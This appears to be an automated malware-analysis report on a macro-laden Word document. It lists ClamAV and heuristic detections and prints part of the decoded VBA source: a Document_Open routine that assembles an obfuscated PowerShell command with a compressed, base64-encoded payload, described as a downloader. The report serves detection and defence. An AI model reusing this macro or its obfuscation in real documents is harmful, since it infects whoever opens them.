Verdict: MALICIOUS

Risk Score: 262

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains a VBA macro with a Document_Open auto-execution routine. The macro is designed to execute a PowerShell command that downloads and runs a second-stage payload from a remote URL. The presence of the Shell() call together with the obfuscated PowerShell command strongly indicates downloader functionality.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6605695-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6605695-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE): Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17597 bytes |

SHA-256: 0e9ac262efd5d02a9b620f3e1bf31caf405f09645a222c92c5ad7e2907b10405

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "OlhHEAHaUAAwuS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
SZrspI = 49177 - TCZXAk + 7297 - klJYwP + 57858 * jHjArE
wrirzk = 11911 - jlYmpu + 58622 - cLODQ + 29526 * BqFjXH
tdCvKL = 64630 - YmPTCF + 83714 - qdiwsW + 32732 * cpoZO
jEFifSDnakQM ("" + JGMwCpRCh + rsiRmdv + ZOupG + EjHSIIs + qwBJwpcob + vYYfERnq + dvfhonrnwzMpG)
NvFSC = 35125 - wRTwb + 35334 - YJKGi + 28775 * JUADi
XVVamt = 20481 - SKiuB + 53066 - Yqbaw + 32932 * puCLvE
hSVXI = 25761 - YGXdj + 23755 - ZqspC + 85652 * pvABh
End Sub
Attribute VB_Name = "PXajawz"
Function ZOupG()
On Error Resume Next
mjNDd = (MMmmPK / LOOiVK + zjLmzd - olDHiW)
UYzQMWuEmX = "pow" + aWHiAPhiWj + LjwaNPXGXb + "er" + EXbjihn + toIObwhwjPT + "sh" + dCEjUHoa + SHdcowApszpRuq + "e" + SpHrLkkwtZiz + bEzppGzTtAj + "l" + SSLHOUipwTF + XhiPTCcMWlUE + "l " + owwGKmJ + iRQdiqclsCG + "." + ldhdzNvhr + OtqCMuAZ + "( " + AwCZwWu + BvVZNSYhpvW + "$" + ODOkAZYzCjiLk + DwrBiPBRsUd + "e" + NLdiIJkzLOWUb + OrNdntdqEVNbMm + "Nv" + XqkkqDvCa + skVjGlCDBHz + ":C" + kUZMviXNqwziqu + vKCsOkGj + "OM" + qJiTIXtq + ijHrXSClVC + "sp" + usGwzEfzOqYos + WpckAumjMDK + "ec["
iUNmqz = 30187 - NMZpKA / nKSwI / fvtRPw - 14398 * ttmjj * (33153 + dmwtwo * dCvqu + tBkMMI)
llSoHsiu = "4,2" + UaCIiUSnG + OKYUFKzWSrWZ + "6" + SrJaWbOUJSX + JoKOoPLQidPGB + ",2" + GbzBAfMcJNj + tAGzPUqiHd + "5]-" + qMkOtTVT + iUVpKzMBB + "j" + qWhWSrhRz + OrJTcNPtOflfSl + "Oin" + JtVFbdtApC + cnBlOkGifrV + "''" + HqlFrPlqRXYc + lwJiZVnRad + ")" + ifztSYWUU + uwmGkKPd + "( " + NVfWMvdzqQ + ahFtYFz + "new" + CwqOjnODGK + vUKSXFdsWiWAp + "-ob" + ArmKdDw + oHjHOujFHO + "JE" + vbAAWNDX + ZIhOMUAVnzJnd + "c" + VdbuRsbtsF + JHptnvziYaAi + "T s" + lafDHzk + jbdJwzP + "y" + wjqOzGVr + AvdsfLGANpzR + "St" + GGRKmzkIkrmf + dZhQRBaFGi + "EM"
rzBzLi = 64476 - IrpLF / wsKlGA / jXoHjA - 99702 * AziNo * (15856 + HljHwH * ljWLl + ivVcw)
LJtfFu = ".io" + MsiihzIsGz + KkZFzCpVmE + ".cO" + OwZEiGQnAN + BcQIFtdZuNszW + "mPr" + uLmnHIIQlZD + hcXzpjD + "E" + jPsbLaADciOd + NanktMfiCfc + "sS" + pvHpMGIiX + ziPhzVwWLBK + "iO" + wKJGwNM + ILIUsBXMw + "n.D" + HnKzzljhFjQ + FtCwCjKihd + "E" + ZccwzwE + uIzMJMjfsnrfk + "fL" + zbKQfwaJltXIDk + MLfKkDjsTdCo + "A" + YoNdzYoopvUz + lEdvmFiUE + "TE"
wrSwB = mSCViu + mhtYV * (ploRGP * 1600 + 13813 / kDDkI)
KqiDJjkhI = "STr" + VroAijLzCJDI + GwUOdHaL + "EA" + nkizRwl + BXjhjHEdTEFz + "m" + YwEQtltGKKnNzw + EXsXDoZRkHZ + "(" + GbCooJCM + ZruMWtVKGSozh + "[i" + sjXnfmLQzDi + JoITVjSfJc + "O." + OzSLSHuzNv + ZDFObuIoIwB + "mEM" + UiBmvjHU + ptEhwnnLN + "Or" + uSaEEOTOPRv + zdtKSLR + "Y" + mPUWNLAU + CfaLaiqVoGAwt + "S" + jTudsCz + jKjiBHOujIzW + "tR" + SbcqdEJnW + dsFrskEMqf + "EAM" + ITjrFSlsfNCbBQ + ObsoGNYPID + "]"
FSijM = qQXVVm + EpSOnJ * (RwnXN * 84285 + 48500 / ifkFZ)
uJjmD = TWwMDV + joPpiq * (YjzOna * 85357 + 89556 / RjCiNz)
QYYwpX = XWDWY + ZiMMz * (MRwck * 48551 + 53505 / dBrXlT)
uAdIWRD = "[" + hPwRaiEODpoYMZ + JTIJiHVUVUlrkP + "C" + fukwosoirZUYD + FWlwFrPQ + "on" + dvGwNinczsRoLK + ZSEnzRVKjUw + "v" + AQdKEKzi + vjvGHsQLbfa + "e" + LmwMZvQsfUVwcn + zUznoJHC + "rT]"
SPJXo = jTSXHz + mWlQL * (JfEmEb * 21229 + 55746 / IBfuBM)
iHjoN = VGwCw + RDtvb * (hOcEv * 55989 + 7283 / KQrNv)
zAkFCcPzsvC = "::" + CIilvWijFZ + LFHkSAiOX + "F" + DkIwFOlG + vAlQqFK + "RO" + zVOltEIHuvfuzY + AnYdRUTcQPE + "M" + cvUjbiqozO + HqLGHzcpppRlCi + "BAs" + mVdAmnS + LWtFmBZf + "E6" + iIVJRcji + ijwAnBiksKT + "4S" + uvbjjCos + TAuQLLYFJf + "TRi" + fZsSlXpmVrG + NqtzbwkcJdA + "n" + SYUFJroRQBqR + DTBctzpzV + "G(" + hhlBVwsY + QSPhOJK + "'VZ" + CfKhhIIBGwvUD + bKCQvFzsQMmBmu + "DL" + fAjcbXAEsNvlc + NcRGEHtCkFnt + "bsI" + HVHbIPUXNWEJzX + MQLcZZUo + "wF" + lwwXoifJlroJ + PqPvCuJWUasXh + "ER/" + iASBbiWaph + ompVCwWNiJZ + "J"
XPdWiR = nnDqVI + KsPZNc * (UjiEq * 51626 + 21370 / nYbhVE)
DPfYIBmVksR = "YtI" + LQdrBiz
... (truncated)
```